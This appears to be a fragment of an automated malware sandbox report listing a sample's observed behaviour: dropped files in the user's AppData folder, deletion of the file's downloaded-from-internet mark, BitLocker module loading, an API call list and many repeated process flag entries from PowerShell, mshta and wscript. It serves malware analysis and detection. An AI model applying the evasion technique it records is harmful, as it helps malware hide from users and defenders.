Source: C:\Windows\explorer.exe	Code function: 21_2_005D14D4 push esi; ret	21_2_005D14D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02793417 push esp; iretd	22_2_02793418
Source: C:\Windows\explorer.exe	Code function: 26_2_005D14D4 push esi; ret	26_2_005D14D6
Source: C:\Windows\explorer.exe	Code function: 26_2_005D1405 push esi; ret	26_2_005D1407
Source: C:\Windows\explorer.exe	Code function: 26_2_005D45A7 push esp; iretd	26_2_005D45A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02793627 push esp; iretd	27_2_02793628
Source: C:\Windows\explorer.exe	Code function: 28_2_0014AAD2 push ebp; iretd	28_2_0014AAD3
Source: C:\Windows\explorer.exe	Code function: 28_2_0014AC8D push esp; iretd	28_2_0014AC95
Source: C:\Windows\explorer.exe	Code function: 28_2_00144817 push esp; iretd	28_2_00144818
Source: C:\Windows\explorer.exe	Code function: 28_2_00141405 push esi; ret	28_2_00141407
Source: C:\Windows\explorer.exe	Code function: 28_2_001414D4 push esi; ret	28_2_001414D6

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\icgfugf			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll			Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\icgfugf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\icgfugf:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 20_2_02CA3862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

20_2_02CA3862

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
